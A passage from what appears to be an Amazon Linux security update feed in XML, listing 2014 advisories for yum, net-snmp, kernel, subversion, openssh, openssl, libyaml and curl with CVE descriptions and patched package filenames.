arch="x86_64"><filename>Packages/php55-debuginfo-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.10" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.10-1.67.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.10" release="1.67.amzn1" epoch="0" 
arch="i686"><filename>Packages/php55-intl-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.10" release="1.67.amzn1" epoch="0" 
arch="i686"><filename>Packages/php55-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.10" release="1.67.amzn1" epoch="0" 
arch="i686"><filename>Packages/php55-pspell-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.10-1.67.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.10" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.10-1.67.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-315</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-315: medium priority package update for yum</title><issued date="2014-03-24 23:38:00" /><updated date="2014-09-18 00:05:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0022:
The installUpdates function in yum-cron/yum-cron.py in yum 3.4.3 and earlier does not properly check the return value of the sigCheckPkg function, which allows remote attackers to bypass the RPM package signing restriction via an unsigned package.
1057377:
CVE-2014-0022 yum: yum-cron installs unsigned packages
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0022" title="" id="CVE-2014-0022" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="yum-cron-security" version="3.4.3" release="137.49.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-cron-security-3.4.3-137.49.amzn1.noarch.rpm</filename></package><package name="yum-cron-hourly" version="3.4.3" release="137.49.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-cron-hourly-3.4.3-137.49.amzn1.noarch.rpm</filename></package><package name="yum" version="3.4.3" release="137.49.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-3.4.3-137.49.amzn1.noarch.rpm</filename></package><package name="yum-cron" version="3.4.3" release="137.49.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-cron-3.4.3-137.49.amzn1.noarch.rpm</filename></package><package name="yum-cron-daily" version="3.4.3" release="137.49.amzn1" epoch="0" arch="noarch"><filename>Packages/yum-cron-daily-3.4.3-137.49.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-316</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-316: medium priority package update for net-snmp</title><issued date="2014-03-24 23:39:00" /><updated date="2014-09-18 00:06:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2284:
A buffer overflow flaw was found in the way the decode_icmp_msg() function in the ICMP-MIB implementation processed Internet Control Message Protocol (ICMP) message statistics reported in the /proc/net/snmp file. A remote attacker could send a message for each ICMP message type, which could potentially cause the snmpd service to crash when processing the /proc/net/snmp file.
CVE-2012-6151:
Net-SNMP 5.7.1 and earlier, when AgentX is registering to handle a MIB and processing GETNEXT requests, allows remote attackers to cause a denial of service (crash or infinite loop, CPU consumption, and hang) by causing the AgentX subagent to timeout.
1038007:
CVE-2012-6151 net-snmp: snmpd crashes/hangs when AgentX subagent times out
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6151" title="" id="CVE-2012-6151" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2284" title="" id="CVE-2014-2284" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0321.html" title="" id="RHSA-2014:0321" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="net-snmp-debuginfo" version="5.5" release="49.18.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-debuginfo-5.5-49.18.amzn1.x86_64.rpm</filename></package><package name="net-snmp-python" version="5.5" release="49.18.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-python-5.5-49.18.amzn1.x86_64.rpm</filename></package><package name="net-snmp-perl" version="5.5" release="49.18.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-perl-5.5-49.18.amzn1.x86_64.rpm</filename></package><package name="net-snmp-utils" version="5.5" release="49.18.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-utils-5.5-49.18.amzn1.x86_64.rpm</filename></package><package name="net-snmp-devel" version="5.5" release="49.18.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-devel-5.5-49.18.amzn1.x86_64.rpm</filename></package><package name="net-snmp-libs" version="5.5" release="49.18.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-libs-5.5-49.18.amzn1.x86_64.rpm</filename></package><package name="net-snmp" version="5.5" release="49.18.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-5.5-49.18.amzn1.x86_64.rpm</filename></package><package name="net-snmp" version="5.5" release="49.18.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-5.5-49.18.amzn1.i686.rpm</filename></package><package name="net-snmp-libs" version="5.5" release="49.18.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-libs-5.5-49.18.amzn1.i686.rpm</filename></package><package 
name="net-snmp-utils" version="5.5" release="49.18.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-utils-5.5-49.18.amzn1.i686.rpm</filename></package><package name="net-snmp-perl" version="5.5" release="49.18.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-perl-5.5-49.18.amzn1.i686.rpm</filename></package><package name="net-snmp-devel" version="5.5" release="49.18.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-devel-5.5-49.18.amzn1.i686.rpm</filename></package><package name="net-snmp-debuginfo" version="5.5" release="49.18.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-debuginfo-5.5-49.18.amzn1.i686.rpm</filename></package><package name="net-snmp-python" version="5.5" release="49.18.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-python-5.5-49.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-317</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-317: low priority package update for kernel</title><issued date="2014-03-24 23:39:00" /><updated date="2014-09-18 00:06:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0101:
The sctp_sf_do_5_1D_ce function in net/sctp/sm_statefuns.c in the Linux kernel through 3.13.6 does not validate certain auth_enable and auth_capable fields before making an sctp_sf_authenticate call, which allows remote attackers to cause a denial of service (NULL pointer dereference and system crash) via an SCTP handshake with a modified INIT chunk and a crafted AUTH chunk before a COOKIE_ECHO chunk.
1070705:
CVE-2014-0101 kernel: net: sctp: null pointer dereference when processing authenticated cookie_echo chunk
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0101" title="" id="CVE-2014-0101" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="3.10.34" release="37.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.10.34-37.137.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.10.34" release="37.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.10.34-37.137.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.10.34" release="37.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.10.34-37.137.amzn1.x86_64.rpm</filename></package><package name="perf" version="3.10.34" release="37.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-3.10.34-37.137.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="3.10.34" release="37.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-3.10.34-37.137.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.10.34" release="37.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.10.34-37.137.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.10.34" release="37.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.10.34-37.137.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.10.34" release="37.137.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.10.34-37.137.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.10.34" release="37.137.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.10.34-37.137.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="3.10.34" release="37.137.amzn1" epoch="0" 
arch="i686"><filename>Packages/perf-debuginfo-3.10.34-37.137.amzn1.i686.rpm</filename></package><package name="perf" version="3.10.34" release="37.137.amzn1" epoch="0" arch="i686"><filename>Packages/perf-3.10.34-37.137.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.10.34" release="37.137.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.10.34-37.137.amzn1.i686.rpm</filename></package><package name="kernel" version="3.10.34" release="37.137.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.10.34-37.137.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.10.34" release="37.137.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.10.34-37.137.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.10.34" release="37.137.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.10.34-37.137.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-318</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-318: medium priority package update for subversion</title><issued date="2014-03-25 12:14:00" /><updated date="2014-09-18 00:07:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0032:
The get_resource function in repos.c in the mod_dav_svn module in Apache Subversion before 1.7.15 and 1.8.x before 1.8.6, when SVNListParentPath is enabled, allows remote attackers to cause a denial of service (crash) via vectors related to the server root and request methods other than GET, as demonstrated by the "svn ls http://svn.example.com" command.
A flaw was found in the way the mod_dav_svn module handled OPTIONS requests. A remote attacker with read access to an SVN repository served via HTTP could use this flaw to cause the httpd process that handled such a request to crash.
1062042:
CVE-2014-0032 subversion: mod_dav_svn crash when handling certain requests with SVNListParentPath on
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0032" title="" id="CVE-2014-0032" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="subversion-ruby" version="1.8.8" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-ruby-1.8.8-1.42.amzn1.x86_64.rpm</filename></package><package name="subversion-javahl" version="1.8.8" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-javahl-1.8.8-1.42.amzn1.x86_64.rpm</filename></package><package name="subversion-tools" version="1.8.8" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-tools-1.8.8-1.42.amzn1.x86_64.rpm</filename></package><package name="subversion" version="1.8.8" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-1.8.8-1.42.amzn1.x86_64.rpm</filename></package><package name="subversion-perl" version="1.8.8" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-perl-1.8.8-1.42.amzn1.x86_64.rpm</filename></package><package name="subversion-libs" version="1.8.8" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-libs-1.8.8-1.42.amzn1.x86_64.rpm</filename></package><package name="subversion-devel" version="1.8.8" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-devel-1.8.8-1.42.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn" version="1.8.8" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-1.8.8-1.42.amzn1.x86_64.rpm</filename></package><package name="subversion-debuginfo" version="1.8.8" release="1.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-debuginfo-1.8.8-1.42.amzn1.x86_64.rpm</filename></package><package name="subversion-python" version="1.8.8" release="1.42.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/subversion-python-1.8.8-1.42.amzn1.x86_64.rpm</filename></package><package name="subversion-debuginfo" version="1.8.8" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-debuginfo-1.8.8-1.42.amzn1.i686.rpm</filename></package><package name="subversion-devel" version="1.8.8" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-devel-1.8.8-1.42.amzn1.i686.rpm</filename></package><package name="subversion-python" version="1.8.8" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python-1.8.8-1.42.amzn1.i686.rpm</filename></package><package name="subversion-tools" version="1.8.8" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-tools-1.8.8-1.42.amzn1.i686.rpm</filename></package><package name="subversion-libs" version="1.8.8" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-libs-1.8.8-1.42.amzn1.i686.rpm</filename></package><package name="subversion-ruby" version="1.8.8" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-ruby-1.8.8-1.42.amzn1.i686.rpm</filename></package><package name="subversion-perl" version="1.8.8" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-perl-1.8.8-1.42.amzn1.i686.rpm</filename></package><package name="subversion-javahl" version="1.8.8" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-javahl-1.8.8-1.42.amzn1.i686.rpm</filename></package><package name="subversion" version="1.8.8" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-1.8.8-1.42.amzn1.i686.rpm</filename></package><package name="mod_dav_svn" version="1.8.8" release="1.42.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-1.8.8-1.42.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2014-319</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-319: important priority package update for openssh</title><issued date="2014-03-28 18:25:00" /><updated date="2014-09-18 00:48:00" /><severity>important</severity><description /><references /><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssh-ldap" version="6.2p2" release="7.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-6.2p2-7.39.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="6.2p2" release="7.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-6.2p2-7.39.amzn1.x86_64.rpm</filename></package><package name="openssh" version="6.2p2" release="7.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-6.2p2-7.39.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="6.2p2" release="7.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-6.2p2-7.39.amzn1.x86_64.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="5.7.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.9.3-5.7.39.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="6.2p2" release="7.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-6.2p2-7.39.amzn1.x86_64.rpm</filename></package><package name="openssh-keycat" version="6.2p2" release="7.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-6.2p2-7.39.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="6.2p2" release="7.39.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-6.2p2-7.39.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="6.2p2" release="7.39.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-keycat-6.2p2-7.39.amzn1.i686.rpm</filename></package><package name="openssh-ldap" version="6.2p2" release="7.39.amzn1" 
epoch="0" arch="i686"><filename>Packages/openssh-ldap-6.2p2-7.39.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="5.7.39.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.9.3-5.7.39.amzn1.i686.rpm</filename></package><package name="openssh-server" version="6.2p2" release="7.39.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-6.2p2-7.39.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="6.2p2" release="7.39.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-6.2p2-7.39.amzn1.i686.rpm</filename></package><package name="openssh" version="6.2p2" release="7.39.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-6.2p2-7.39.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-320</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-320: critical priority package update for openssl</title><issued date="2014-04-07 17:26:00" /><updated date="2014-09-18 00:19:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0160:
1084875:
CVE-2014-0160 openssl: information disclosure in handling of TLS heartbeat extension packets
CVE-2013-0169:
This update fixes three vulnerabilities in the Oracle Java Runtime Environment and the Oracle Java Software Development Kit. Further information about these flaws can be found on the Oracle Java SE Critical Patch Update Advisory page, listed in the References section.
This update fixes several vulnerabilities in the Oracle Java Runtime Environment and the Oracle Java Software Development Kit. Further information about these flaws can be found on the Oracle Java SE Critical Patch Update Advisory page, listed in the References section.
This update fixes several vulnerabilities in the IBM Java Runtime Environment and the IBM Java Software Development Kit. Detailed vulnerability descriptions are linked from the IBM Security alerts page, listed in the References section.
The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue.
It was discovered that OpenSSL leaked timing information when decrypting TLS/SSL and DTLS protocol encrypted records when CBC-mode cipher suites were used. A remote attacker could possibly use this flaw to retrieve plain text from the encrypted packets by using a TLS/SSL or DTLS server as a padding oracle.
It was discovered that OpenJDK leaked timing information when decrypting TLS/SSL protocol encrypted records when CBC-mode cipher suites were used. A remote attacker could possibly use this flaw to retrieve plain text from the encrypted packets by using a TLS/SSL server as a padding oracle.
907589:
CVE-2013-0169 SSL/TLS: CBC padding timing attack (lucky-13)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0169" title="" id="CVE-2013-0169" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160" title="" id="CVE-2014-0160" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-devel" version="1.0.1e" release="37.66.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.1e-37.66.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1e" release="37.66.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1e-37.66.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1e" release="37.66.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.1e-37.66.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.1e" release="37.66.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.1e-37.66.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1e" release="37.66.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.1e-37.66.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1e" release="37.66.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.1e-37.66.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.1e" release="37.66.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.1e-37.66.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.1e" release="37.66.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.1e-37.66.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.1e" release="37.66.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.1e-37.66.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1e" release="37.66.amzn1" epoch="1" 
arch="i686"><filename>Packages/openssl-debuginfo-1.0.1e-37.66.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-321</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-321: important priority package update for libyaml</title><issued date="2014-04-10 23:54:00" /><updated date="2014-09-18 00:19:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2525:
Heap-based buffer overflow in the yaml_parser_scan_uri_escapes function in LibYAML before 0.1.6 allows context-dependent attackers to execute arbitrary code via a long sequence of percent-encoded characters in a URI in a YAML file.
1078083:
CVE-2014-2525 libyaml: heap-based buffer overflow when parsing URLs
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2525" title="" id="CVE-2014-2525" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libyaml-devel" version="0.1.6" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libyaml-devel-0.1.6-1.6.amzn1.x86_64.rpm</filename></package><package name="libyaml-debuginfo" version="0.1.6" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libyaml-debuginfo-0.1.6-1.6.amzn1.x86_64.rpm</filename></package><package name="libyaml" version="0.1.6" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/libyaml-0.1.6-1.6.amzn1.x86_64.rpm</filename></package><package name="libyaml-debuginfo" version="0.1.6" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/libyaml-debuginfo-0.1.6-1.6.amzn1.i686.rpm</filename></package><package name="libyaml-devel" version="0.1.6" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/libyaml-devel-0.1.6-1.6.amzn1.i686.rpm</filename></package><package name="libyaml" version="0.1.6" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/libyaml-0.1.6-1.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-322</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-322: medium priority package update for curl</title><issued date="2014-04-10 23:54:00" /><updated date="2014-09-18 00:20:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0138:
1079148:
CVE-2014-0138 curl: wrong re-use of connections in libcurl
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0138" title="" id="CVE-2014-0138" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl-debuginfo" version="7.36.0" release="2.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.36.0-2.44.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.36.0" release="2.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.36.0-2.44.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.36.0" release="2.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.36.0-2.44.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.36.0" release="2.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.36.0-2.44.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.36.0" release="2.44.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.36.0-2.44.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.36.0" release="2.44.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.36.0-2.44.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.36.0" release="2.44.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.36.0-2.44.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.36.0" release="2.44.amzn1" epoch="0" 